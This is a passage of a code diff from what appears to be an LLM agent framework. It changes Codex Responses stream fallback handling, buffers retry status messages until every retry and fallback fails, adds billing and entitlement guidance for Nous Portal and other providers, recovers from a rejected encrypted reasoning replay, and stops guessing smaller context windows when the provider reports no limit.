return agent._run_codex_create_stream_fallback(api_kwargs, client=active_client)
raise
try:
# Compatibility: some mocks/providers return a concrete response
# instead of an iterable. Pass it straight through.
if hasattr(event_stream, "output") and not hasattr(event_stream, "__iter__"):
return event_stream
try:
final = _consume_codex_event_stream(
event_stream,
model=api_kwargs.get("model"),
on_text_delta=_on_text_delta,
on_reasoning_delta=_on_reasoning_delta,
on_first_delta=on_first_delta,
on_event=_on_event,
interrupt_check=_interrupt_check,
)
except (_httpx.RemoteProtocolError, _httpx.ReadTimeout, _httpx.ConnectError, ConnectionError) as exc:
if attempt < max_stream_retries:
logger.debug(
"Codex Responses stream transport failed mid-iteration "
"(attempt %s/%s); retrying. %s error=%s",
attempt + 1, max_stream_retries + 1,
agent._client_log_context(), exc,
)
continue
raise
if final.status in {"incomplete", "failed"}:
logger.warning(
"Codex Responses stream terminal status=%s "
"(incomplete_details=%s, error=%s, streamed_chars=%d). %s",
final.status, final.incomplete_details, final.error,
sum(len(p) for p in agent._codex_streamed_text_parts),
agent._client_log_context(),
)
return final
finally:
close_fn = getattr(event_stream, "close", None)
if callable(close_fn):
try:
close_fn()
except Exception:
pass
def run_codex_create_stream_fallback(agent, api_kwargs: dict, client: Any = None):
"""Fallback path for stream completion edge cases on Codex-style Responses backends."""
active_client = client or agent._ensure_primary_openai_client(reason="codex_create_stream_fallback")
fallback_kwargs = dict(api_kwargs)
fallback_kwargs["stream"] = True
fallback_kwargs = agent._get_transport().preflight_kwargs(fallback_kwargs, allow_stream=True)
stream_or_response = active_client.responses.create(**fallback_kwargs)
# Compatibility shim for mocks or providers that still return a concrete response.
if hasattr(stream_or_response, "output"):
return stream_or_response
if not hasattr(stream_or_response, "__iter__"):
return stream_or_response
terminal_response = None
collected_output_items: list = []
collected_text_deltas: list = []
try:
for event in stream_or_response:
agent._touch_activity("receiving stream response")
event_type = getattr(event, "type", None)
if not event_type and isinstance(event, dict):
event_type = event.get("type")
# ``error`` SSE frames carry the provider's real failure
# reason (subscription / quota / model-not-available /
# rejected-reasoning-replay) but never appear in the
# ``{completed, incomplete, failed}`` terminal set, so the
# raw loop below would silently consume them and end with
# "did not emit a terminal response". xAI in particular
# emits ``type=error`` as the FIRST frame for OAuth
# accounts whose Grok subscription is missing/exhausted —
# the SDK's stream helper raises ``RuntimeError(Expected
# to have received response.created before error)`` which
# the caller catches and routes here, expecting this
# fallback to surface the message. Synthesize an
# APIError-shaped exception so ``_summarize_api_error``
# and the credential-pool entitlement detector see the
# real text instead of a generic RuntimeError.
if event_type == "error":
err_message = getattr(event, "message", None)
if not err_message and isinstance(event, dict):
err_message = event.get("message")
err_code = getattr(event, "code", None)
if not err_code and isinstance(event, dict):
err_code = event.get("code")
err_param = getattr(event, "param", None)
if not err_param and isinstance(event, dict):
err_param = event.get("param")
err_message = (err_message or "stream emitted error event").strip()
from run_agent import _StreamErrorEvent
raise _StreamErrorEvent(err_message, code=err_code, param=err_param)
# Collect output items and text deltas for backfill
if event_type == "response.output_item.done":
done_item = getattr(event, "item", None)
if done_item is None and isinstance(event, dict):
done_item = event.get("item")
if done_item is not None:
collected_output_items.append(done_item)
elif event_type in {"response.output_text.delta",}:
delta = getattr(event, "delta", "")
if not delta and isinstance(event, dict):
delta = event.get("delta", "")
if delta:
collected_text_deltas.append(delta)
if event_type not in {"response.completed", "response.incomplete", "response.failed"}:
continue
terminal_response = getattr(event, "response", None)
if terminal_response is None and isinstance(event, dict):
terminal_response = event.get("response")
if terminal_response is not None:
# Backfill empty output from collected stream events
_out = getattr(terminal_response, "output", None)
if isinstance(_out, list) and not _out:
if collected_output_items:
terminal_response.output = list(collected_output_items)
logger.debug(
"Codex fallback stream: backfilled %d output items",
len(collected_output_items),
)
elif collected_text_deltas:
assembled = "".join(collected_text_deltas)
terminal_response.output = [SimpleNamespace(
type="message", role="assistant",
status="completed",
content=[SimpleNamespace(type="output_text", text=assembled)],
)]
logger.debug(
"Codex fallback stream: synthesized from %d deltas (%d chars)",
len(collected_text_deltas), len(assembled),
)
return terminal_response
finally:
close_fn = getattr(stream_or_response, "close", None)
if callable(close_fn):
try:
close_fn()
except Exception:
pass
if terminal_response is not None:
return terminal_response
raise RuntimeError("Responses create(stream=True) fallback did not emit a terminal response.")
"""Backward-compatible alias for the unified event-driven path.
Historically this was the fallback when the SDK's high-level
``responses.stream(...)`` helper raised on shape drift. The primary
path now does exactly what the fallback did, so this just forwards.
Kept as a public symbol because tests and a small number of call sites
still reference it by name.
"""
return run_codex_stream(agent, api_kwargs, client=client)
__all__ = [
"run_codex_app_server_turn",
"run_codex_stream",
"run_codex_create_stream_fallback",
"_consume_codex_event_stream",
]
+6 -1
View File
@@ -71,7 +71,12 @@ class ContextEngine(ABC):
def update_from_response(self, usage: Dict[str, Any]) -> None:
"""Update tracked token usage from an API response.
Called after every LLM call with the usage dict from the response.
Called after every LLM call with a normalized usage dict. The legacy
keys ``prompt_tokens``, ``completion_tokens``, and ``total_tokens``
are always present. Newer hosts also include canonical buckets:
``input_tokens``, ``output_tokens``, ``cache_read_tokens``,
``cache_write_tokens``, and ``reasoning_tokens``. Engines should
treat those fields as optional for compatibility with older hosts.
"""
@abstractmethod
+1
View File
@@ -421,6 +421,7 @@ def compress_context(
agent.session_id or "",
boundary_reason="compression",
old_session_id=_old_sid,
conversation_id=getattr(agent, "_gateway_session_key", None),
)
except Exception as _ce_err:
logger.debug("context engine on_session_start (compression): %s", _ce_err)
+417 -117
View File
@@ -49,9 +49,8 @@ from agent.model_metadata import (
MINIMUM_CONTEXT_LENGTH,
estimate_messages_tokens_rough,
estimate_request_tokens_rough,
get_next_probe_tier,
get_context_length_from_provider_error,
parse_available_output_tokens_from_error,
parse_context_limit_from_error,
save_context_length,
)
from agent.nous_rate_guard import (
@@ -127,6 +126,106 @@ def _ra():
return run_agent
def _nous_entitlement_message(capability: str) -> str:
try:
from hermes_cli.nous_account import (
format_nous_portal_entitlement_message,
get_nous_portal_account_info,
)
account_info = get_nous_portal_account_info(force_fresh=True)
message = format_nous_portal_entitlement_message(
account_info,
capability=capability,
)
return message or ""
except Exception:
return ""
def _print_nous_entitlement_guidance(agent, capability: str) -> bool:
message = _nous_entitlement_message(capability)
if not message:
return False
for line in message.splitlines():
agent._vprint(f"{agent.log_prefix} 💡 {line}", force=True)
return True
def _is_nous_inference_route(provider: str, base_url: str) -> bool:
provider = (provider or "").strip().lower()
if provider == "nous":
return True
base = str(base_url or "")
return (
base_url_host_matches(base, "inference-api.nousresearch.com")
or base_url_host_matches(base, "inference.nousresearch.com")
)
def _billing_or_entitlement_message(
*,
capability: str,
provider: str,
base_url: str,
model: str,
) -> str:
if _is_nous_inference_route(provider, base_url):
return _nous_entitlement_message(capability)
provider_label = (provider or "").strip() or "the selected provider"
model_label = (model or "").strip() or "the selected model"
lines = [
(
f"{provider_label} reported that billing, credits, or account "
f"entitlement is exhausted for {model_label}."
),
"Add credits or update billing with that provider, then retry.",
]
if base_url_host_matches(str(base_url or ""), "openrouter.ai"):
lines.append("OpenRouter credits: https://openrouter.ai/settings/credits")
lines.append("You can switch providers temporarily with /model <model> --provider <provider>.")
return "\n".join(lines)
def _print_billing_or_entitlement_guidance(
agent,
*,
capability: str,
provider: str,
base_url: str,
model: str,
) -> bool:
message = _billing_or_entitlement_message(
capability=capability,
provider=provider,
base_url=base_url,
model=model,
)
if not message:
return False
for line in message.splitlines():
agent._vprint(f"{agent.log_prefix} 💡 {line}", force=True)
return True
def _try_refresh_nous_paid_entitlement_credentials(agent) -> bool:
"""Refresh Nous runtime credentials after a fresh paid-entitlement check."""
try:
from hermes_cli.auth import NOUS_INFERENCE_AUTH_MODE_LEGACY
from hermes_cli.nous_account import get_nous_portal_account_info
account_info = get_nous_portal_account_info(force_fresh=True)
if account_info.paid_service_access is not True:
return False
return agent._try_refresh_nous_client_credentials(
force=False,
inference_auth_mode=NOUS_INFERENCE_AUTH_MODE_LEGACY,
)
except Exception:
return False
def _restore_or_build_system_prompt(agent, system_message, conversation_history):
"""Restore the cached system prompt from the session DB or build it fresh.
@@ -1017,8 +1116,10 @@ def run_conversation(
codex_auth_retry_attempted=False
anthropic_auth_retry_attempted=False
nous_auth_retry_attempted=False
nous_paid_entitlement_refresh_attempted=False
copilot_auth_retry_attempted=False
thinking_sig_retry_attempted = False
invalid_encrypted_content_retry_attempted = False
image_shrink_retry_attempted = False
multimodal_tool_content_retry_attempted = False
oauth_1m_beta_retry_attempted = False
@@ -1049,17 +1150,18 @@ def run_conversation(
f"Nous Portal rate limit active — "
f"resets in {_fmt_nous_remaining(_nous_remaining)}."
)
agent._vprint(
f"{agent.log_prefix}{_nous_msg} Trying fallback...",
force=True,
agent._buffer_vprint(
f"{_nous_msg} Trying fallback..."
)
agent._emit_status(f"{_nous_msg}")
agent._buffer_status(f"{_nous_msg}")
if agent._try_activate_fallback():
retry_count = 0
compression_attempts = 0
primary_recovery_attempted = False
continue
# No fallback available — return with clear message
# No fallback available — surface buffered context
# so user sees the rate-limit message that led here.
agent._flush_status_buffer()
agent._persist_session(messages, conversation_history)
return {
"final_response": (
@@ -1081,6 +1183,14 @@ def run_conversation(
try:
agent._reset_stream_delivery_tracking()
# api_messages is built once, before this retry loop, while the
# primary provider is active. A mid-conversation fallback can
# switch to a require-side provider (DeepSeek / Kimi / MiMo) that
# rejects assistant turns lacking reasoning_content. Re-apply the
# echo-back pad for the *current* provider here (idempotent no-op
# unless the active provider needs it) so the fallback request
# isn't sent with stale, primary-shaped reasoning fields.
agent._reapply_reasoning_echo_for_provider(api_messages)
api_kwargs = agent._build_api_kwargs(api_messages)
if agent._force_ascii_payload:
_sanitize_structure_non_ascii(api_kwargs)
@@ -1274,9 +1384,10 @@ def run_conversation(
error_details.append("response.choices is empty")
if response_invalid:
# Stop spinner before printing error messages
# Stop spinner silently — retry status is now buffered
# and only surfaced if every retry+fallback exhausts.
if thinking_spinner:
thinking_spinner.stop("(´;ω;`) oops, retrying...")
thinking_spinner.stop("")
thinking_spinner = None
if agent.thinking_callback:
agent.thinking_callback("")
@@ -1289,7 +1400,7 @@ def run_conversation(
# rate-limit symptom. Switch to fallback immediately
# rather than retrying with extended backoff.
if agent._fallback_index < len(agent._fallback_chain):
agent._emit_status("⚠️ Empty/malformed response — switching to fallback...")
agent._buffer_status("⚠️ Empty/malformed response — switching to fallback...")
if agent._try_activate_fallback():
retry_count = 0
compression_attempts = 0
@@ -1351,20 +1462,22 @@ def run_conversation(
else:
_failure_hint = f"response time {api_duration:.1f}s"
agent._vprint(f"{agent.log_prefix}⚠️ Invalid API response (attempt {retry_count}/{max_retries}): {', '.join(error_details)}", force=True)
agent._vprint(f"{agent.log_prefix} 🏢 Provider: {provider_name}", force=True)
agent._buffer_vprint(f"⚠️ Invalid API response (attempt {retry_count}/{max_retries}): {', '.join(error_details)}")
agent._buffer_vprint(f" 🏢 Provider: {provider_name}")
cleaned_provider_error = agent._clean_error_message(error_msg)
agent._vprint(f"{agent.log_prefix} 📝 Provider message: {cleaned_provider_error}", force=True)
agent._vprint(f"{agent.log_prefix} ⏱️ {_failure_hint}", force=True)
agent._buffer_vprint(f" 📝 Provider message: {cleaned_provider_error}")
agent._buffer_vprint(f" ⏱️ {_failure_hint}")
if retry_count >= max_retries:
# Try fallback before giving up
agent._emit_status(f"⚠️ Max retries ({max_retries}) for invalid responses — trying fallback...")
agent._buffer_status(f"⚠️ Max retries ({max_retries}) for invalid responses — trying fallback...")
if agent._try_activate_fallback():
retry_count = 0
compression_attempts = 0
primary_recovery_attempted = False
continue
# Terminal — flush buffered retry trace so user sees what happened.
agent._flush_status_buffer()
agent._emit_status(f"❌ Max retries ({max_retries}) exceeded for invalid responses. Giving up.")
logger.error(f"{agent.log_prefix}Invalid API response after {max_retries} retries.")
agent._persist_session(messages, conversation_history)
@@ -1378,7 +1491,7 @@ def run_conversation(
# Backoff before retry — jittered exponential: 5s base, 120s cap
wait_time = jittered_backoff(retry_count, base_delay=5.0, max_delay=120.0)
agent._vprint(f"{agent.log_prefix}⏳ Retrying in {wait_time:.1f}s ({_failure_hint})...", force=True)
agent._buffer_vprint(f"⏳ Retrying in {wait_time:.1f}s ({_failure_hint})...")
logger.warning(f"Invalid API response (retry {retry_count}/{max_retries}): {', '.join(error_details)} | Provider: {provider_name}")
# Sleep in small increments to stay responsive to interrupts
@@ -1605,14 +1718,14 @@ def run_conversation(
if assistant_message is not None and _trunc_has_tool_calls:
if truncated_tool_call_retries < 1:
truncated_tool_call_retries += 1
agent._vprint(
f"{agent.log_prefix}⚠️ Truncated tool call detected — retrying API call...",
force=True,
agent._buffer_vprint(
f"⚠️ Truncated tool call detected — retrying API call..."
)
# Don't append the broken response to messages;
# just re-run the same API call from the current
# message state, giving the model another chance.
continue
agent._flush_status_buffer()
agent._vprint(
f"{agent.log_prefix}⚠️ Truncated tool call response detected again — refusing to execute incomplete tool arguments.",
force=True,
@@ -1646,6 +1759,7 @@ def run_conversation(
}
else:
# First message was truncated - mark as failed
agent._flush_status_buffer()
agent._vprint(f"{agent.log_prefix}❌ First response truncated - cannot recover", force=True)
agent._persist_session(messages, conversation_history)
return {
@@ -1667,10 +1781,19 @@ def run_conversation(
prompt_tokens = canonical_usage.prompt_tokens
completion_tokens = canonical_usage.output_tokens
total_tokens = canonical_usage.total_tokens
# Forward canonical token + cache buckets so context engines
# can make decisions on cache hit ratios / reasoning costs,
# not just legacy aggregate tokens. Legacy keys stay for
# back-compat with engines that only read prompt/completion/total.
usage_dict = {
"prompt_tokens": prompt_tokens,
"completion_tokens": completion_tokens,
"total_tokens": total_tokens,
"input_tokens": canonical_usage.input_tokens,
"output_tokens": canonical_usage.output_tokens,
"cache_read_tokens": canonical_usage.cache_read_tokens,
"cache_write_tokens": canonical_usage.cache_write_tokens,
"reasoning_tokens": canonical_usage.reasoning_tokens,
}
agent.context_compressor.update_from_response(usage_dict)
@@ -1788,6 +1911,11 @@ def run_conversation(
)
has_retried_429 = False # Reset on success
# Note: don't clear the retry buffer here — an "API call
# success" only means we got bytes back, not that we got
# usable content. Empty responses still loop through the
# empty-retry path below; the buffer is cleared when
# genuinely successful content is detected later (~L4127).
# Clear Nous rate limit state on successful request —
# proves the limit has reset and other sessions can
# resume hitting Nous.
@@ -1814,9 +1942,10 @@ def run_conversation(
break
except Exception as api_error:
# Stop spinner before printing error messages
# Stop spinner silently — retry status is buffered and
# only flushed when every retry+fallback is exhausted.
if thinking_spinner:
thinking_spinner.stop("(╥_╥) error, retrying...")
thinking_spinner.stop("")
thinking_spinner = None
if agent.thinking_callback:
agent.thinking_callback("")
@@ -1871,14 +2000,12 @@ def run_conversation(
if _surrogates_found or _is_surrogate_error:
agent._unicode_sanitization_passes += 1
if _surrogates_found:
agent._vprint(
f"{agent.log_prefix}⚠️ Stripped invalid surrogate characters from messages. Retrying...",
force=True,
agent._buffer_vprint(
f"⚠️ Stripped invalid surrogate characters from messages. Retrying..."
)
else:
agent._vprint(
f"{agent.log_prefix}⚠️ Surrogate encoding error — retrying after full-payload sanitization...",
force=True,
agent._buffer_vprint(
f"⚠️ Surrogate encoding error — retrying after full-payload sanitization..."
)
continue
if _is_ascii_codec:
@@ -2092,6 +2219,23 @@ def run_conversation(
classified.should_rotate_credential, classified.should_fallback,
)
if (
classified.reason == FailoverReason.billing
and _is_nous_inference_route(
getattr(agent, "provider", "") or "",
getattr(agent, "base_url", "") or "",
)
and not nous_paid_entitlement_refresh_attempted
):
nous_paid_entitlement_refresh_attempted = True
if _try_refresh_nous_paid_entitlement_credentials(agent):
agent._vprint(
f"{agent.log_prefix}🔐 Nous paid access verified — "
"refreshed runtime credentials and retrying request...",
force=True,
)
continue
recovered_with_pool, has_retried_429 = agent._recover_with_credential_pool(
status_code=status_code,
has_retried_429=has_retried_429,
@@ -2189,7 +2333,7 @@ def run_conversation(
codex_auth_retry_attempted = True
if agent._try_refresh_codex_client_credentials(force=True):
_label = "xAI OAuth" if agent.provider == "xai-oauth" else "Codex"
agent._vprint(f"{agent.log_prefix}🔐 {_label} auth refreshed after 401. Retrying request...")
agent._buffer_vprint(f"🔐 {_label} auth refreshed after 401. Retrying request...")
continue
if (
agent.api_mode == "chat_completions"
@@ -2216,9 +2360,10 @@ def run_conversation(
print(f"{agent.log_prefix}🔐 Nous 401 — Portal authentication failed.")
if _body_text:
print(f"{agent.log_prefix} Response: {_body_text}")
print(f"{agent.log_prefix} Most likely: Portal OAuth expired, account out of credits, or agent key revoked.")
if not _print_nous_entitlement_guidance(agent, "Nous model access"):
print(f"{agent.log_prefix} Most likely: Portal OAuth expired, account out of credits, or agent key revoked.")
print(f"{agent.log_prefix} Troubleshooting:")
print(f"{agent.log_prefix} • Re-authenticate: hermes login --provider nous")
print(f"{agent.log_prefix} • Re-authenticate: hermes auth add nous")
print(f"{agent.log_prefix} • Check credits / billing: https://portal.nousresearch.com")
print(f"{agent.log_prefix} • Verify stored credentials: {_dhh}/auth.json")
print(f"{agent.log_prefix} • Switch providers temporarily: /model <model> --provider openrouter")
@@ -2229,7 +2374,7 @@ def run_conversation(
):
copilot_auth_retry_attempted = True
if agent._try_refresh_copilot_client_credentials():
agent._vprint(f"{agent.log_prefix}🔐 Copilot credentials refreshed after 401. Retrying request...")
agent._buffer_vprint(f"🔐 Copilot credentials refreshed after 401. Retrying request...")
continue
if (
agent.api_mode == "anthropic_messages"
@@ -2296,6 +2441,49 @@ def run_conversation(
)
continue
# ── Invalid encrypted reasoning replay recovery ───────
# OpenAI Responses API surfaces (and some compatible relays)
# return HTTP 400 ``invalid_encrypted_content`` when a
# replayed ``codex_reasoning_items`` blob from a previous
# turn fails verification (provider rotated the encryption
# key, the route doesn't actually persist reasoning state,
# etc.). Recovery: disable replay for the rest of the
# session, strip cached items from history, retry once.
# One-shot — if a second 400 fires we fall through to the
# normal retry/backoff path. Only fires for codex_responses
# mode with at least one assistant message that has cached
# ``codex_reasoning_items``; without replay state, the
# error is unrelated to our cache so the normal retry path
# handles it (the provider is rejecting something else).
if (
classified.reason == FailoverReason.invalid_encrypted_content
and not invalid_encrypted_content_retry_attempted
and agent.api_mode == "codex_responses"
and bool(getattr(agent, "_codex_reasoning_replay_enabled", True))
and any(
isinstance(_m, dict)
and _m.get("role") == "assistant"
and isinstance(_m.get("codex_reasoning_items"), list)
and _m.get("codex_reasoning_items")
for _m in messages
)
):
invalid_encrypted_content_retry_attempted = True
replay_stats = agent._disable_codex_reasoning_replay(messages)
agent._vprint(
f"{agent.log_prefix}⚠️ Encrypted reasoning replay was rejected by the provider — "
f"disabled replay and stripped {replay_stats['items']} item(s) from "
f"{replay_stats['messages']} message(s), retrying...",
force=True,
)
logger.warning(
"%sInvalid encrypted reasoning recovery: disabled replay and stripped %d items from %d messages",
agent.log_prefix,
replay_stats["items"],
replay_stats["messages"],
)
continue
# ── llama.cpp grammar-parse recovery ──────────────────
# llama.cpp's ``json-schema-to-grammar`` converter rejects
# regex escape classes (``\d``, ``\w``, ``\s``) and most
@@ -2361,41 +2549,37 @@ def run_conversation(
_base = getattr(agent, "base_url", "unknown")
_model = getattr(agent, "model", "unknown")
_status_code_str = f" [HTTP {status_code}]" if status_code else ""
agent._vprint(f"{agent.log_prefix}⚠️ API call failed (attempt {retry_count}/{max_retries}): {error_type}{_status_code_str}", force=True)
agent._vprint(f"{agent.log_prefix} 🔌 Provider: {_provider} Model: {_model}", force=True)
agent._vprint(f"{agent.log_prefix} 🌐 Endpoint: {_base}", force=True)
agent._vprint(f"{agent.log_prefix} 📝 Error: {_error_summary}", force=True)
agent._buffer_vprint(f"⚠️ API call failed (attempt {retry_count}/{max_retries}): {error_type}{_status_code_str}")
agent._buffer_vprint(f" 🔌 Provider: {_provider} Model: {_model}")
agent._buffer_vprint(f" 🌐 Endpoint: {_base}")
agent._buffer_vprint(f" 📝 Error: {_error_summary}")
if status_code and status_code < 500:
_err_body = getattr(api_error, "body", None)
_err_body_str = str(_err_body)[:300] if _err_body else None
if _err_body_str:
agent._vprint(f"{agent.log_prefix} 📋 Details: {_err_body_str}", force=True)
agent._vprint(f"{agent.log_prefix} ⏱️ Elapsed: {elapsed_time:.2f}s Context: {len(api_messages)} msgs, ~{approx_tokens:,} tokens")
agent._buffer_vprint(f" 📋 Details: {_err_body_str}")
agent._buffer_vprint(f" ⏱️ Elapsed: {elapsed_time:.2f}s Context: {len(api_messages)} msgs, ~{approx_tokens:,} tokens")
# Actionable hint for OpenRouter "no tool endpoints" error.
# This fires regardless of whether fallback succeeds — the
# user needs to know WHY their model failed so they can fix
# their provider routing, not just silently fall back.
# Buffered like the rest of the retry trace — surfaced only
# if every retry+fallback exhausts. Avoids spamming users
# who recover automatically via fallback.
if (
agent._is_openrouter_url()
and "support tool use" in error_msg
):
agent._vprint(
f"{agent.log_prefix} 💡 No OpenRouter providers for {_model} support tool calling with your current settings.",
force=True,
agent._buffer_vprint(
f" 💡 No OpenRouter providers for {_model} support tool calling with your current settings."
)
if agent.providers_allowed:
agent._vprint(
f"{agent.log_prefix} Your provider_routing.only restriction is filtering out tool-capable providers.",
force=True,
agent._buffer_vprint(
f" Your provider_routing.only restriction is filtering out tool-capable providers."
)
agent._vprint(
f"{agent.log_prefix} Try removing the restriction or adding providers that support tools for this model.",
force=True,
agent._buffer_vprint(
f" Try removing the restriction or adding providers that support tools for this model."
)
agent._vprint(
f"{agent.log_prefix} Check which providers support tools: https://openrouter.ai/models/{_model}",
force=True,
agent._buffer_vprint(
f" Check which providers support tools: https://openrouter.ai/models/{_model}"
)
# Check for interrupt before deciding to retry
@@ -2445,11 +2629,10 @@ def run_conversation(
# user later enables extra usage the 1M limit
# should come back automatically.
compressor._context_probe_persistable = False
agent._vprint(
f"{agent.log_prefix}⚠️ Anthropic long-context tier "
agent._buffer_vprint(
f"⚠️ Anthropic long-context tier "
f"requires extra usage — reducing context: "
f"{old_ctx:,}{_reduced_ctx:,} tokens",
force=True,
f"{old_ctx:,}{_reduced_ctx:,} tokens"
)
compression_attempts += 1
@@ -2465,7 +2648,7 @@ def run_conversation(
# messages to the new session, not skipping them.
conversation_history = None
if len(messages) < original_len or old_ctx > _reduced_ctx:
agent._emit_status(
agent._buffer_status(
f"🗜️ Context reduced to {_reduced_ctx:,} tokens "
f"(was {old_ctx:,}), retrying..."
)
@@ -2494,7 +2677,12 @@ def run_conversation(
base_url=getattr(agent, "base_url", None),
)
if not pool_may_recover:
agent._emit_status("⚠️ Rate limited — switching to fallback provider...")
if classified.reason == FailoverReason.billing:
agent._buffer_status(
"⚠️ Billing or credits exhausted — switching to fallback provider..."
)
else:
agent._buffer_status("⚠️ Rate limited — switching to fallback provider...")
if agent._try_activate_fallback(reason=classified.reason):
retry_count = 0
compression_attempts = 0
@@ -2606,6 +2794,8 @@ def run_conversation(
if is_payload_too_large:
compression_attempts += 1
if compression_attempts > max_compression_attempts:
# Terminal — surface the buffered retry trace.
agent._flush_status_buffer()
agent._vprint(f"{agent.log_prefix}❌ Max compression attempts ({max_compression_attempts}) reached for payload-too-large error.", force=True)
agent._vprint(f"{agent.log_prefix} 💡 Try /new to start a fresh conversation, or /compress to retry compression.", force=True)
logger.error(f"{agent.log_prefix}413 compression failed after {max_compression_attempts} attempts.")
@@ -2619,7 +2809,7 @@ def run_conversation(
"failed": True,
"compression_exhausted": True,
}
agent._emit_status(f"⚠️ Request payload too large (413) — compression attempt {compression_attempts}/{max_compression_attempts}...")
agent._buffer_status(f"⚠️ Request payload too large (413) — compression attempt {compression_attempts}/{max_compression_attempts}...")
original_len = len(messages)
messages, active_system_prompt = agent._compress_context(
@@ -2632,11 +2822,14 @@ def run_conversation(
conversation_history = None
if len(messages) < original_len:
agent._emit_status(f"🗜️ Compressed {original_len}{len(messages)} messages, retrying...")
agent._buffer_status(f"🗜️ Compressed {original_len}{len(messages)} messages, retrying...")
time.sleep(2) # Brief pause between compression retries
restart_with_compressed_messages = True
break
else:
# Terminal — surface buffered context so the user
# sees what compression attempts were made.
agent._flush_status_buffer()
agent._vprint(f"{agent.log_prefix}❌ Payload too large and cannot compress further.", force=True)
agent._vprint(f"{agent.log_prefix} 💡 Try /new to start a fresh conversation, or /compress to retry compression.", force=True)
logger.error(f"{agent.log_prefix}413 payload too large. Cannot compress further.")
@@ -2680,16 +2873,16 @@ def run_conversation(
# touching context_length or triggering compression.
safe_out = max(1, available_out - 64) # small safety margin
agent._ephemeral_max_output_tokens = safe_out
agent._vprint(
f"{agent.log_prefix}⚠️ Output cap too large for current prompt — "
agent._buffer_vprint(
f"⚠️ Output cap too large for current prompt — "
f"retrying with max_tokens={safe_out:,} "
f"(available_tokens={available_out:,}; context_length unchanged at {old_ctx:,})",
force=True,
f"(available_tokens={available_out:,}; context_length unchanged at {old_ctx:,})"
)
# Still count against compression_attempts so we don't
# loop forever if the error keeps recurring.
compression_attempts += 1
if compression_attempts > max_compression_attempts:
agent._flush_status_buffer()
agent._vprint(f"{agent.log_prefix}❌ Max compression attempts ({max_compression_attempts}) reached.", force=True)
agent._vprint(f"{agent.log_prefix} 💡 Try /new to start a fresh conversation, or /compress to retry compression.", force=True)
logger.error(f"{agent.log_prefix}Context compression failed after {max_compression_attempts} attempts.")
@@ -2706,9 +2899,13 @@ def run_conversation(
restart_with_compressed_messages = True
break
# Error is about the INPUT being too large — reduce context_length.
# Try to parse the actual limit from the error message
parsed_limit = parse_context_limit_from_error(error_msg)
# Error is about the INPUT being too large. Only reduce
# context_length when the provider explicitly reports the
# real lower limit. If the provider only says "input
# exceeds the context window", keep the configured window
# and try compression; guessing probe tiers can incorrectly
# turn a user-configured 1M window into 256K/128K/64K.
new_ctx = get_context_length_from_provider_error(error_msg, old_ctx)
_provider_lower = (getattr(agent, "provider", "") or "").lower()
_base_lower = (getattr(agent, "base_url", "") or "").rstrip("/").lower()
is_minimax_provider = (
@@ -2720,24 +2917,12 @@ def run_conversation(
)
minimax_delta_only_overflow = (
is_minimax_provider
and parsed_limit is None
and new_ctx is None
and "context window exceeds limit (" in error_msg
)
if parsed_limit and parsed_limit < old_ctx:
new_ctx = parsed_limit
agent._vprint(f"{agent.log_prefix}Context limit detected from API: {new_ctx:,} tokens (was {old_ctx:,})", force=True)
elif minimax_delta_only_overflow:
new_ctx = old_ctx
agent._vprint(
f"{agent.log_prefix}Provider reported overflow amount only; "
f"keeping context_length at {old_ctx:,} tokens and compressing.",
force=True,
)
else:
# Step down to the next probe tier
new_ctx = get_next_probe_tier(old_ctx)
if new_ctx and new_ctx < old_ctx:
if new_ctx is not None:
agent._buffer_vprint(f"Context limit detected from API: {new_ctx:,} tokens (was {old_ctx:,})")
compressor.update_model(
model=agent.model,
context_length=new_ctx,
@@ -2747,23 +2932,26 @@ def run_conversation(
api_mode=agent.api_mode,
)
# Context probing flags — only set on built-in
# compressor (plugin engines manage their own).
# compressor (plugin engines manage their own). This
# value came from the provider, so it is safe to cache.
if hasattr(compressor, "_context_probed"):
compressor._context_probed = True
# Only persist limits parsed from the provider's
# error message (a real number). Guessed fallback
# tiers from get_next_probe_tier() should stay
# in-memory only — persisting them pollutes the
# cache with wrong values.
compressor._context_probe_persistable = bool(
parsed_limit and parsed_limit == new_ctx
)
agent._vprint(f"{agent.log_prefix}⚠️ Context length exceeded — stepping down: {old_ctx:,}{new_ctx:,} tokens", force=True)
compressor._context_probe_persistable = True
agent._buffer_vprint(f"⚠️ Context length exceeded — using provider limit: {old_ctx:,}{new_ctx:,} tokens")
elif minimax_delta_only_overflow:
agent._buffer_vprint(
f"Provider reported overflow amount only; "
f"keeping context_length at {old_ctx:,} tokens and compressing."
)
else:
agent._vprint(f"{agent.log_prefix}⚠️ Context length exceeded at minimum tier — attempting compression...", force=True)
agent._buffer_vprint(
f"⚠️ Context length exceeded, but provider did not report a max context length; "
f"keeping context_length at {old_ctx:,} tokens and compressing."
)
compression_attempts += 1
if compression_attempts > max_compression_attempts:
agent._flush_status_buffer()
agent._vprint(f"{agent.log_prefix}❌ Max compression attempts ({max_compression_attempts}) reached.", force=True)
agent._vprint(f"{agent.log_prefix} 💡 Try /new to start a fresh conversation, or /compress to retry compression.", force=True)
logger.error(f"{agent.log_prefix}Context compression failed after {max_compression_attempts} attempts.")
@@ -2777,7 +2965,7 @@ def run_conversation(
"failed": True,
"compression_exhausted": True,
}
agent._emit_status(f"🗜️ Context too large (~{approx_tokens:,} tokens) — compressing ({compression_attempts}/{max_compression_attempts})...")
agent._buffer_status(f"🗜️ Context too large (~{approx_tokens:,} tokens) — compressing ({compression_attempts}/{max_compression_attempts})...")
original_len = len(messages)
messages, active_system_prompt = agent._compress_context(
@@ -2791,12 +2979,13 @@ def run_conversation(
if len(messages) < original_len or new_ctx and new_ctx < old_ctx:
if len(messages) < original_len:
agent._emit_status(f"🗜️ Compressed {original_len}{len(messages)} messages, retrying...")
agent._buffer_status(f"🗜️ Compressed {original_len}{len(messages)} messages, retrying...")
time.sleep(2) # Brief pause between compression retries
restart_with_compressed_messages = True
break
else:
# Can't compress further and already at minimum tier
agent._flush_status_buffer()
agent._vprint(f"{agent.log_prefix}❌ Context length exceeded and cannot compress further.", force=True)
agent._vprint(f"{agent.log_prefix} 💡 The conversation has accumulated too much content. Try /new to start fresh, or /compress to manually trigger compression.", force=True)
logger.error(f"{agent.log_prefix}Context length exceeded: {approx_tokens:,} tokens. Cannot compress further.")
@@ -2835,6 +3024,21 @@ def run_conversation(
# ssl.SSLError explicitly so the error classifier's
# retryable=True mapping takes effect instead.
and not isinstance(api_error, ssl.SSLError)
# Provider/SDK "NoneType is not iterable" failures are
# shape mismatches from upstream (e.g. chatgpt.com Codex
# backend response.completed.output=null) — not local
# programming bugs. Even after #33042 made our own
# consumer immune, third-party shims and mocked clients
# can still surface this shape via TypeError. Treat
